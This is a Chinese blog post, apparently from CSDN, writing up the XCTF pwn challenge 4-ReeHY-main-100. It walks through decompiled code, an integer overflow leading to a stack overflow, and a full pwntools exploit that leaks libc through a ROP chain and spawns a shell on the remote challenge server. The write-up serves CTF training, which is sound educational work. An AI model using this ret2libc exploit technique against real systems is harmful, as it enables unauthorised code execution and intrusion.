4-ReeHY-main-100 [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列22

最新推荐文章于 2022-04-05 18:26:07 发布
最新推荐文章于 2022-04-05 18:26:07 发布
阅读量679 收藏
点赞数
分类专栏: XCTF-PWN CTF 文章标签: 攻防世界 xctf ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fastergohome/article/details/103721549
版权
CTF 同时被 2 个专栏收录
46 篇文章 4 订阅
订阅专栏
XCTF-PWN
28 篇文章 10 订阅
订阅专栏

题目地址:4-ReeHY-main-100

本题是高手进阶区的第11题,已经逐步稳定在5颗星的难度级别了。

废话不说,看看题目先

照例检查一下保护机制:

[*] '/ctf/work/python/4-ReeHY-main-100/4-ReeHY-main'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

没什么问题,那我们就先反编译一下看看c语言代码,我已经把主要函数都进行了变量和函数重命名。

这一步非常重要,我们在做题目的时候,首先就要通读源代码,理解作者的意图。

如果是一片v1,v2,v3的情况下,我们是没法阅读清楚代码的用意的。当然也有小伙伴可能喜欢硬怼,但是我认为初级阶段可能还能够靠着一腔热血和各种大佬的通杀符箓,当题目的级别上升到一定高度之后,对于代码的理解能力的要求会越来越高。

如果代码都不能仔细阅读情况的情况下,debug调试就会无的放矢,导致最后各种放弃。

这种放弃的根本原因,在我看来就是因为不重视语言基础,当你没有能力读懂代码的情况下,首先不要去找漏洞,先把代码读明白。一切自然就会水到渠成!

啰嗦了几句,下面看看我已经改造好的代码:

1、main函数

 

void __fastcall main(__int64 a1, char **a2, char **a3)
{
  int nChoice; // [rsp+10h] [rbp+0h]

  read_name();
  while ( 1 )
  {
    menu_string();
    read_int();
    switch ( (unsigned int)&nChoice )
    {
      case 1u:
        create_exploit();
        break;
      case 2u:
        delete_exploit();
        break;
      case 3u:
        edit_exploit();
        break;
      case 4u:
        show_exploit();
        break;
      case 5u:
        puts("bye~bye~ young hacker");
        exit(0);
        return;
      default:
        puts("Invalid Choice!");
        break;
    }
  }
}

这部分代码看起来,简单明了。这样已经重新改造之后的代码,就不会再产生误解了

2、create_exploit函数

signed int create_exploit()
{
  signed int nTemp; // eax
  char buf; // [rsp+0h] [rbp-90h]
  void *pszExploit; // [rsp+80h] [rbp-10h]
  int nIndexCun; // [rsp+88h] [rbp-8h]
  size_t nInputSize; // [rsp+8Ch] [rbp-4h]

  nTemp = g_nCount;
  if ( g_nCount <= 4 )
  {
    puts("Input size");
    nTemp = read_int();
    LODWORD(nInputSize) = nTemp;
    if ( nTemp <= 4096 )
    {
      puts("Input cun");
      nTemp = read_int();
      nIndexCun = nTemp;
      if ( nTemp <= 4 )
      {
        pszExploit = malloc((signed int)nInputSize);
        puts("Input content");
        if ( (signed int)nInputSize > 112 )
        {
          read(0, pszExploit, (unsigned int)nInputSize);
        }
        else
        {
          read(0, &buf, (unsigned int)nInputSize);
          memcpy(pszExploit, &buf, (signed int)nInputSize);
        }
        *(_DWORD *)(g_dwArrInputSize + 4LL * nIndexCun) = nInputSize;
        *((_QWORD *)&g_qwArrExploit + 2 * nIndexCun) = pszExploit;
        g_dwArrValid[4 * nIndexCun] = 1;
        ++g_nCount;
        nTemp = fflush(stdout);
      }
    }
  }
  return nTemp;
}

这里看到nInputSize存在整数溢出,可以输入-1。等下我们再处理,先看完代码。

3、delete_exploit函数

__int64 delete_exploit()
{
  __int64 nInputCun; // rax
  int nIndexCun; // [rsp+Ch] [rbp-4h]

  puts("Chose one to dele");
  nInputCun = read_int();
  nIndexCun = nInputCun;
  if ( (signed int)nInputCun <= 4 )
  {
    free(*((void **)&g_qwArrExploit + 2 * (signed int)nInputCun));
    g_dwArrValid[4 * nIndexCun] = 0;
    puts("dele success!");
    nInputCun = (unsigned int)(g_nCount-- - 1);
  }
  return nInputCun;
}

索引没有做检查,有double free漏洞

4、edit_exploit函数

signed int edit_exploit()
{
  signed int nInputCun; // eax
  signed int nIndexCun; // [rsp+Ch] [rbp-4h]

  puts("Chose one to edit");
  nInputCun = read_int();
  nIndexCun = nInputCun;
  if ( nInputCun <= 4 )
  {
    nInputCun = g_dwArrValid[4 * nInputCun];
    if ( nInputCun == 1 )
    {
      puts("Input the content");
      read(0, *((void **)&g_qwArrExploit + 2 * nIndexCun), *(unsigned int *)(4LL * nIndexCun + g_dwArrInputSize));
      nInputCun = puts("Edit success!");
    }
  }
  return nInputCun;
}

先实验一下整数溢出漏洞,直接在console里面测试就行了:

root@mypwn:/ctf/work/python/4-ReeHY-main-100# ./4-ReeHY-main 
Input your name: 
$ aa
Hello aa

******************************
Welcome to my black weapon storage!
Now you can use it to do some evil things
1. create exploit
2. delete exploit
3. edit exploit
4. show exploit
5. exit
******************************
$ 1
Input size
-1
Input cun
1
Input content
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault
root@mypwn:/ctf/work/python/4-ReeHY-main-100#

我们看到确实出现了Segmentation fault。

我们就很明白了,直接用整数溢出+栈溢出作为切入点,leak write函数got值,其他的都是惯例了,看我前面的介绍文章。

构造一下payload:

pop_rdi_ret = 0x400da3
write_got = elf.got['write']
puts_plt = elf.plt['puts']
main_addr = 0x400C8C
nIndexCun = 10
nInputSize = 0
leak_head = 'A'*0x88 + p32(nIndexCun) + p32(nInputSize) + 'A'*8
payload = leak_head + p64(pop_rdi_ret) + p64(write_got) + p64(puts_plt) + p64(main_addr)

这里注意leak头和平常的不一样,不能直接用'A'*(0x90+8),因为nInputSize如果被覆盖为'AAAA'的话会造成

memcpy(pszExploit, &buf, (signed int)nInputSize);

这句话执行出错,从而没法正常进入函数的后续语句和函数退出。

所以这里我反复提醒c语言代码的重要性,一定要自己去理解每一个变量和函数的意义,并做好正确的重命名。

根据payload,编写python脚本如下:

#coding:utf8
#!python
#!/usr/bin/env python
 
from pwn import *
 
context.log_level = 'debug'
process_name = './4-ReeHY-main'
# p = process([process_name], env={'LD_LIBRARY_PATH':'./'})
p = remote('111.198.29.45', 34843)
elf = ELF(process_name)

def send_choice(payload):
	p.sendlineafter('$ ', payload)

def create_exploit(payload):
	send_choice('A')
	send_choice('1')
	p.sendlineafter('Input size\n', '-1')
	p.sendlineafter('Input cun\n', '-1')
	p.sendlineafter('Input content\n', payload)

pop_rdi_ret = 0x400da3
write_got = elf.got['write']
puts_plt = elf.plt['puts']
main_addr = 0x400C8C
nIndexCun = 10
nInputSize = 0
leak_head = 'A'*0x88 + p32(nIndexCun) + p32(nInputSize) + 'A'*8
payload = leak_head + p64(pop_rdi_ret) + p64(write_got) + p64(puts_plt) + p64(main_addr)

create_exploit(payload)

write_addr = u64(p.recvn(6).ljust(8, '\x00'))
log.info('write_addr => %#x', write_addr)
# p.send(p64(write_addr))

from LibcSearcher import *
libc = LibcSearcher('write', write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
log.info("system_addr => %#x", system_addr)
log.info("binsh_addr => %#x", binsh_addr)
payload = leak_head + p64(pop_rdi_ret) + p64(binsh_addr) + p64(system_addr) + p64(main_addr)

create_exploit(payload)


p.interactive()

执行结果大家自行补充。

本题主要需要注意的知识点是:

  1. 整数溢出
  2. 栈溢出时,注意特殊变量不能任意覆盖

 

3riC5r
关注
专栏目录
PWN系列XCTF-4-ReeHY-main-100 Writeup
Vicl1fe的博客
11-18 393
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://www.cnblogs.com/xingzherufeng/p/9885860.html#commentform https://blog.csdn.net/seaaseesa/article/details/102907138 分析 其实此题有两种解法,一个是整型溢出,一个是double free。因为暂时只搞懂了double free,先写double free的解法 运行程序大概可以看到
pwn1 babystack [XCTF-PWN][高手进阶]CTF writeup攻防世界题解系列19
重新启程
12-25 1645
题目地址:pwn1 babystack 已经到了高手进阶的第八题了,已经渐入佳境了。哈哈! 废话不说,看看题目先 厦门邀请赛的题目,还是2星难度,那就开工了。 管理检查一下保护机制: [*] '/ctf/work/python/pwn1/babystack' Arch: amd64-64-little RELRO: Full RELRO Stac...
攻防世界 4-ReeHY-main-100
BengDouLove的博客
04-01 793
本来想着做2018年的网鼎杯 pwn的,但是就算看了 wp也无法模仿着实现,所以就退而求其次先做一些堆的题吧 18年网鼎杯的pwn有个babyheap,里面用到的unlink我一直不懂,断链是知道咋实现的,但是到底有啥用真是不做题无法体会 然后在攻防世界找了一个pwn题,就是这道题,看了一个肥肠肥肠细致的博主的文章,收获颇多 传送门 下面我就记录一下,题的思路大致和这个博主一样,后面我自己发挥了一...
xctf 4-ReeHY-main-100
发蝴蝶和大脑斧的博客
09-24 718
卡了很久,最后发现他给的libc有点问题,还是用libcsearcher找,贼坑。 参考:https://bbs.pediy.com/thread-218300.htm 首先是unlink修改free的got表为puts,泄露函数地址,然后修改free为system。 # -*- coding: utf-8 -*- from pwn import* from LibcSearcher imp...
XCTF攻防世界 4-ReeHY-main-100 题解
CoLin的pwn小屋
04-05 3722
XCTF 4-ReeHY-main-100 适用于最新版本libc的两种解题姿势
XCTF4-ReeHY-main-100
yms0211的博客
03-20 251
XCTF:4-ReeHY-main-100 这道题用来巩固一下之前学的unlink的利用方法 保护检查: checksec一下: 只开了NX,RELRO和PIE都没有开启,所以可以利用静态调试找出的地址来操作,并且可以使用GOT表覆盖这个技巧 程序分析: main函数: 代码如下: void __fastcall main(__int64 a1, char **a2, char **a3) { sub_400856(a1, a2, a3); while ( 1 ) { sub_4009
4-ReeHY-main-100 一道题学到了很多的知识
qq_41071646的博客
05-14 1278
先说一下参考链接 https://bbs.pediy.com/thread-218300.htm 然后这个题 其实可以按堆的解法来做 也可以按照 栈的解法来做 这个要看自己的做法了 然后我首先看的是堆的解法 一开始我的想法是 直接 double free直接 到 heap_user 但是失败了 然后看了这篇帖子感觉受益匪浅 然后写篇这个帖子来记录一下 ‘ 然后 那篇帖子其实讲的很明白 我...
pwn100 [XCTF-PWN][高手进阶]CTF writeup攻防世界题解系列16
重新启程
12-23 1322
题目地址:pwn100 本题已经是高手进阶的第五题了,难度也在不断加大。需要补充的知识点也越来越多了。 废话不说,看看题目 没什么建议和描述,那就先下载附件,看看保护机制 root@mypwn:/ctf/work/python/pwn-100# checksec d0b5f9b486bb480c9035839ec896252e [*] '/ctf/work/python/pwn-10...
warmup [XCTF-PWN][高手进阶]CTF writeup攻防世界题解系列14
重新启程
12-23 1845
题目地址:warmup 这是高手进阶的第三题,我们先看下题目内容 这个题目没有附件,那就是要fuzz的题目了,我们先正常走一下程序看看 root@mypwn:/ctf/work/python/warmup# nc 111.198.29.45 32453 -Warm Up- WOW:0x40060d >AAA 这个题目的出发点就是要大家做fuzz,看下提示内容有个地址0x40060...
shell [XCTF-PWN][高手进阶]CTF writeup攻防世界题解系列25
重新启程
12-27 759
题目地址:shell 这个题目是高手进阶的第14题,这一题我没有按照顺序来,耍脾气来!呵呵 看看保护机制 [*] '/ctf/work/python/shell/shell' Arch: amd64-64-little RELRO: No RELRO Stack: Canary found NX: NX enabled ...
dice_game [XCTF-PWN][高手进阶]CTF writeup攻防世界题解系列12
重新启程
12-23 1784
题目地址:dice_game 从这篇开始就正式进入高手进阶,一些简单的知识点我这里就不会再重复赘述了,请有需要的同学看前面的章节。 废话不多,看看题目 题目没什么提示,只是知道这个题目的来源是:XCTF 4th-QCTF-2018 下载附件,看看情况,照例做下保护机制检查 root@mypwn:/ctf/work/python/dice_game# checksec dice_g...
攻防世界)(pwn)4-ReeHY-main
PLpa的博客
10-24 411
这题很早之前就做过了,之前做的时候没怎么注意,这次重新写又有很多感受。 0x00前言 这题有两种做法,一种是堆溢出,一种是栈溢出。第一次写的时候,由于刚刚入门,只会用栈溢出,这次重新看,用堆溢出试了一下,由于技术有限,还是出现了很多错误,找了很多资料,磕磕绊绊一下午才利用成功。 故写此博客记录一下。 0x01栈溢出利用方法 此题的栈溢出漏洞比较明显,因为他有一个很明显的整数溢出漏洞,可以导致栈漏洞...
4-ReeHY-main-100(xctf)
weixin_43868725的博客
08-14 301
0x0 程序保护和流程 保护: 流程: main() 程序的问题主要存在于两个函数,第一个问题位于是create() 输入的size是有符号的,而在调用read函数是传入的参数是无符号的。所以存在整数溢出从而导致了栈溢出。 第二个问题位于delete() 只对索引做了限制,没有对堆块的指针清零,所以存在UAF。 0x1 利用过程 栈溢出的利用过程: 对于padding的长度是0x98应该没什么问题,但是在对栈进行覆盖时必须注意栈中变量是否在覆盖后仍然被程序使用并且是否合法。如程序中的 memcpy(
CTF-PWN-4-ReeHY-main-100(堆溢出+double free+unlink)
SuperGate的博客
10-09 621
程序综述 题目包含了一个动态库.so文件和elf文件,checksec查看: supergate@ubuntu:~/Desktop/Pwn$ checksec pwn [*] '/home/supergate/Desktop/Pwn/pwn' Arch: amd64-64-little RELRO: Partial RELRO Stack: No can...
4-ReeHY-main-100_最详细题解PWN
seaaseesa的博客
11-04 2191
Libc2.26以下的解法 使用的是double free的unlink漏洞 unlink是利用glibc malloc 的内存回收机制造成攻击的,核心就在于当两个free的堆块在物理上相邻时,会将他们合并,并将原来free的堆块在原来的链表中解链,加入新的链表中,但这样的合并是有条件的,向前或向后合并。 Unsorted bin使用双向链表维护被释放的空间,如果有一个堆块...
unlink 攻防世界4-ReeHY-main
csdn546229768的博客
12-10 590
例题:攻防世界 4-ReeHY-main 当一个chunk释放为unsort bin时会检查上下是否为free chunk,如果上为free chunk则发生合并、合并后会调用unlink函数:(2.23) /* consolidate backward */ if (!prev_inuse(p)) { //当前的p标志位为0(上个chunk free) prevsize = p->prev_size; size += prevsize; //本chunk的size
攻防世界 4-ReeHY-main
weixin_30552811的博客
09-07 220
检查保护机制:    发现 可以好像写got 然后 程序流程 这里 有double free 然后 再发现 这里很有趣 ,要是我的content为零了 且size 小于112 那就从栈上copy一些内容进去 利用double free ,再修改残留在chunk上的fd的信息 就能达到任意地址...
XCTF攻防世界(2019Xman第一阶段练习赛) Pwn 4-ReeHY-main 两种解法
Kaller的博客
08-05 666
一、栈溢出Getshell 分析 审计IDA代码,发现在create中存在栈溢出、类型转换漏洞。如下: ///栈空间布局 int result; // eax char buf; // [rsp+0h] [rbp-90h] void *dest; // [rsp+80h] [rbp-10h] int index; // [rsp+88h] [rbp-8h] s...
攻防世界PWN进阶pwn100/pwn200/warmup
weixin_45461609的博客
05-12 599
攻防世界PWN进阶pwn200pwn100 pwn200 和CTFWIKI上的ret2libc3大同小异。 条件: 1.有read(),write()函数,无system。 2.在函数sub_8048484中存在栈溢出。 思路: 1.通过栈溢出调用write()函数泄露write()对应的 got 表项的内容,此处将write函数的返回地址设置为main或者sub_8048484的地址以便再次利用栈溢出漏洞 2.通过LibcSearcher获取libc版本 3.获取system函数,”/bi
攻防世界序列化漏洞详解与利用
"攻防世界序列化问题详解" 在网络安全领域,尤其是CTF(Capture The Flag)挑战中,序列化和反序列化是常见的漏洞利用点。本篇内容主要聚焦于攻防世界平台中涉及的序列化问题,通过一道具体的题目来深入解析这一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值